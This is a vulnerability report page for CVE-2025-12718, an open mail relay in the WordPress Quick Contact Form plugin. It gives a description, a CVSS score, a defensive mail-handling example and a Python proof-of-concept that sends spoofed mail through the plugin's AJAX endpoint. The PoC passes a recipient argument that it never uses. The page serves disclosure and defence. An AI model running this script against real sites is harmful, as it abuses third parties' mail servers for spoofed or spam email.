Security Vulnerability Report
CVE-2025-12718 CVSS 5.8 MEDIUM

CVE-2025-12718

Published: 2026-01-17 03:16:03
Last Modified: 2026-04-15 00:35:42

Description

The Quick Contact Form plugin for WordPress is vulnerable to Open Mail Relay in all versions up to, and including, 8.2.6. This is due to the 'qcf_validate_form' AJAX endpoint allowing a user controlled parameter to set the 'from' email address. This makes it possible for unauthenticated attackers to send emails to arbitrary recipients utilizing the server. The information is limited to the contact form submission details.
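The defensive counterpart to the flaw described above, as an added example that is not the plugin's own code: a submission handler that takes only the submitter's address, subject and body from the request, pins both From and To to server-side configuration, and rejects header injection, so a request parameter such as form_email can never choose the sender. Parameter names follow the PoC on this page; SITE_SENDER, ADMIN_RECIPIENT and build_contact_mail are assumed names.

```python
# Added illustration, not the Quick Contact Form plugin's code: a contact-form
# mail builder in which request parameters cannot choose sender or recipient.
# SITE_SENDER, ADMIN_RECIPIENT and build_contact_mail are constructed names.
import re
from email.message import EmailMessage

SITE_SENDER = "noreply@example.org"     # fixed From: the site, never the submitter
ADMIN_RECIPIENT = "owner@example.org"   # fixed To: configured server side, never from the form

# Conservative mailbox pattern: one local part, one domain, no whitespace or separators
_MAILBOX = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def safe_header_value(value: str, limit: int = 200) -> str:
    """Reject CR/LF (header injection) and cap the length of a header value."""
    if "\r" in value or "\n" in value:
        raise ValueError("header injection attempt")
    return value[:limit]


def build_contact_mail(params: dict) -> EmailMessage:
    """Build the notification mail for one form submission.

    Only the submitter's address, subject and message are read from the
    request. From and To are fixed, so a parameter like 'form_email' is
    ignored and the site cannot be used as a relay; the submitter address
    is placed in Reply-To only after validation.
    """
    submitter = safe_header_value(params.get("your-email", "")).strip()
    if not _MAILBOX.fullmatch(submitter):
        raise ValueError("invalid submitter address")
    msg = EmailMessage()
    msg["From"] = SITE_SENDER
    msg["To"] = ADMIN_RECIPIENT
    msg["Reply-To"] = submitter
    msg["Subject"] = "[Contact form] " + safe_header_value(params.get("your-subject", ""), 100)
    msg.set_content(params.get("your-message", "")[:5000])
    return msg
```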

CVSS Details

CVSS Score: 5.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
Weakness: CWE-20 (Improper Input Validation)

Configurations (Affected Products)

No configuration data available.

Quick Contact Form <= 8.2.6 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-12718 PoC - WordPress Quick Contact Form Open Mail Relay
# This PoC demonstrates the Open Mail Relay vulnerability in Quick Contact Form <= 8.2.6

import requests
import sys


def exploit_cve_2025_12718(target_url, attacker_email, victim_email):
    """
    Exploit the Open Mail Relay vulnerability in Quick Contact Form plugin.

    Args:
        target_url: Target WordPress site URL (e.g., https://example.com)
        attacker_email: Email address to set as the 'from' address
        victim_email: Target recipient email address
    """
    # WordPress AJAX endpoint
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Prepare the malicious request data
    # The 'action' parameter must match the registered AJAX action name
    data = {
        'action': 'qcf_validate_form',
        'form_email': attacker_email,  # User-controlled 'from' email address
        'form_subject': 'Test Message',
        'form_message': 'This is a test email sent via Open Mail Relay vulnerability',
        'your-name': 'Attacker',
        'your-email': attacker_email,
        'your-subject': 'Test',
        'your-message': 'Exploitation attempt'
    }

    # Additional headers to make the request look legitimate
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest'
    }

    try:
        print(f"[*] Targeting: {target_url}")
        print(f"[*] Spoofed From: {attacker_email}")
        print(f"[*] Target Recipient: {victim_email}")
        print("[*] Sending malicious request...")

        response = requests.post(ajax_url, data=data, headers=headers, timeout=30)

        if response.status_code == 200:
            print("[+] Request sent successfully!")
            print(f"[+] Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python3 cve-2025-12718.py <target_url> <attacker_email> <victim_email>")
        print("Example: python3 cve-2025-12718.py https://victim.com [email protected] [email protected]")
        sys.exit(1)

    target = sys.argv[1]
    attacker = sys.argv[2]
    victim = sys.argv[3]
    exploit_cve_2025_12718(target, attacker, victim)
```

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3433286%40quick-contact-form&new=3433286%40quick-contact-form&sfp_email=&sfph_mail= (plugin changeset)
https://www.wordfence.com/threat-intel/vulnerabilities/id/dc7ba538-a7ee-48c8-996c-b8db1934fdeb?source=cve (Wordfence advisory)
